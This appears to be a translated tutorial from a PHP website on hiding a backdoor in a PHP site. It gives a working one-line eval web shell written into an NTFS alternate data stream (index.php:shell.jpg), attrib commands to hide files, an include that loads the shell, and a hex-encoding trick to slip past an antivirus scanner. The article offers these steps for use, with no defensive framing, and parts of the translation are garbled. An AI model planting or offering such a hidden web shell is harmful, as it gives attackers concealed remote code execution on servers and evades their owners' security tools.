How to hide backdoor in php?

How to hide the backdoor in php: first create a system hidden file and create an ADS hidden file; then use jpd by including the file; finally, hex encode [index.php:shell.jpg] .

How to hide the backdoor in php:

1. attrib s h

Create system hidden files.

attrib s a r h / attrib s hFile name

##View hidden files

2. Use ADS to hide files

NTFS Exchange Data Streams (Alternate Data Streams, referred to as ADS) It is a feature of the NTFS disk format. Under the NTFS file system, each file can have multiple data streams. The popular understanding is that other files can be "hosted" on a certain file, but in the resource manager, only the host file can be seen, and the host file cannot be found. We can do a lot of interesting things with ADS data streams. (Copied)

1. First create the ADS hidden file

In the command line, echo a data stream in, for example, the index file is normal document.

echo ^<?php @eval($_REQUEST[1]);?^> > index.php:shell.jpg

This generates an invisible index.php:shell.jpg

Available

dir/r Command to view

Modification and deletion

Modification:

Enter the directory where the file is located, notepad index.php:shell. jpg

#How to delete index.php:shell.jpg?

Delete index.php directly

2. The file contains

We generated index.php:shell .jpg, can be used by including the file.

<?php include(‘index.php:shell.jpg‘)?>

Technical sharing pictures

You can also use the method you learned above to hide include.php

3. Avoid killing

It doesn’t work if you hide it, brother dei, the D shield explodes instantly when you sweep it.

Encode index.php:shell.jpg hex

<?php 
$a="696E6465782E7068703A7368656C6C2E6A7067";
 // index.php:shell.jpg hex编码
$b="a";
include(PACK(‘H*‘,$$b))
?>

##Related learning recommendations:

PHP programming from entry to proficiency

The above is the detailed content of How to hide backdoor in php?. For more information, please follow other related articles on the PHP Chinese website!